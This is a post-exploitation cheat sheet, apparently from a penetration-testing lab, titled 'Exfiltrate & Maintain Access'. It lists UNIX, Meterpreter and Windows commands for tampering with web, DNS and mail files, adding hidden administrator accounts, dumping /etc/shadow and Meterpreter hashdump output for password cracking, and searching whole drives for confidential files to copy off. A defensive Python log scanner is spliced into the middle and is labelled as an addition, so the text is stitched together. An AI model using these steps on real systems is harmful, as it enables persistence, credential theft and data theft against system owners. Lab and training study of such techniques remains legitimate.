Exfiltrate & Maintain Access

The following table describes various actions that can be performed to exfiltrate sensitive data or maintain access on systems that have been infiltrated.

Each row below gives the UNIX, Meterpreter and Windows variants of one action.

Modify/Delete Key System Files

UNIX:
    Look here for web page HTML files:
        /var/www/
    Look here for DNS records:
        /var/cache/bind/
    Use nano to view/modify key files:
        nano fileName

Meterpreter:
    Use the UNIX column for a Linux target, or the Windows column for a Windows target.

Windows:
    Look here for web page HTML files:
        C:\Program Files\Apache2\htdocs\
    Look here for e-mail files:
        C:\Inetpub\mail
    Key files can be viewed/modified using notepad:
        notepad fileName
Create a User Account

UNIX:
    As the root user, execute the following command in a shell:
        adduser username

Meterpreter:
    In the meterpreter shell, execute the following command to drop into a Windows shell on the target:
        shell
    Now, in the Windows shell, execute the following:
        net user username password /add
    and set the account privileges to administrator (root):
        net localgroup Administrators username /add
    Return to the meterpreter by entering exit in the Windows shell.

Windows:
    In the Windows command prompt, run the following as the administrator (the * makes net prompt for the new password instead of placing it on the command line):
        net user username * /add
    and set the account privileges to administrator (root):
        net localgroup Administrators username /add
Obtain Account Password Hashes

UNIX:
    As the root user, execute the following command in a shell:
        cat /etc/shadow
    Copy and paste the output into a file on your virtual host for password cracking later.

Meterpreter:
    In the meterpreter shell, execute the following command:
        hashdump
    Copy and paste the output into a file for password cracking later.

Windows:
    In the Windows command prompt it is not possible to print out the password hashes using built-in programs; you must use Metasploit for this.
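As a detection counterpart to the UNIX column of the two rows above (account creation and reading /etc/shadow), here is an added example that is not part of the original page: a small Python scanner over constructed auth.log lines in the syslog format that useradd, usermod and sudo write. The host name, account names and timestamps are made up.

```python
import re

# Constructed sample auth.log lines (not taken from any real host). They show
# the UNIX-column actions as a defender sees them: an account created with
# adduser (which calls useradd), that account placed in an admin group, and
# /etc/shadow read through sudo. The sshd and apt lines are benign.
SAMPLE_AUTH_LOG = """\
Mar  3 10:14:02 web01 sshd[2210]: Accepted password for alice from 10.0.0.5 port 51022 ssh2
Mar  3 10:15:41 web01 useradd[2301]: new user: name=svc_backup, UID=1002, GID=1002, home=/home/svc_backup, shell=/bin/bash
Mar  3 10:15:41 web01 usermod[2305]: add 'svc_backup' to group 'sudo'
Mar  3 10:16:10 web01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/bin/cat /etc/shadow
Mar  3 10:20:33 web01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt update
"""

ADMIN_GROUPS = {"sudo", "wheel", "admin", "root"}

# Patterns for the syslog lines that useradd, usermod/gpasswd and sudo write.
NEW_USER_RE = re.compile(r"useradd\[\d+\]: new user: name=([^,]+)")
GROUP_ADD_RE = re.compile(r"(?:add '([^']+)' to group '([^']+)'|Adding user (\S+) to group (\S+))")
SUDO_RE = re.compile(r"sudo:\s+(\S+) : .*?COMMAND=(.+)$")


def scan_auth_log(text):
    """Return one finding per suspicious line as (kind, account_or_actor, detail)."""
    findings = []
    for line in text.splitlines():
        m = NEW_USER_RE.search(line)
        if m:
            findings.append(("account_created", m.group(1), line.split(": ", 1)[1]))
            continue
        m = GROUP_ADD_RE.search(line)
        if m:
            user = m.group(1) or m.group(3)
            group = m.group(2) or m.group(4)
            if group in ADMIN_GROUPS:
                findings.append(("admin_group_added", user, group))
            continue
        # Only commands run through sudo are logged; a root login shell reading
        # /etc/shadow directly leaves no auth.log trace and needs auditd instead.
        m = SUDO_RE.search(line)
        if m and "/etc/shadow" in m.group(2):
            findings.append(("shadow_accessed", m.group(1), m.group(2).strip()))
    return findings


if __name__ == "__main__":
    for kind, who, detail in scan_auth_log(SAMPLE_AUTH_LOG):
        print(f"{kind:18} {who:12} {detail}")
```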
Search for Sensitive Information

UNIX:
    Search for files in probable directories containing "confidential" or "secret" with the following command executed in a shell:
        egrep -r -i "confidential|secret" /home
    The output lists the full pathnames of files containing the word "confidential" or "secret". Use cat to dump the contents of the file(s) to the screen, then copy and paste the contents into a file on your virtual host.

Meterpreter:
    In the meterpreter shell, execute the following command to drop into a Windows shell on the target:
        shell
    Now, in the Windows shell, execute the following command:
        findstr /I /P /S "confidential secret" C:\*
    The output shows each matching line together with the pathname of the file containing it. Use type to dump the contents of the file(s) to the screen, then copy and paste the contents into a file on your virtual host.
    Return to the meterpreter by entering exit in the Windows shell.

Windows:
    In the Windows command prompt, run the following as the administrator to search for files containing "confidential" or "secret" on the entire C: drive (this includes all subdirectories, so it may take a long time!):
        findstr /I /P /S "confidential secret" C:\*
    The output shows each matching line together with the pathname of the file containing it. Use type to dump the contents of the file(s) to the screen, then copy and paste the contents into a file on your virtual host.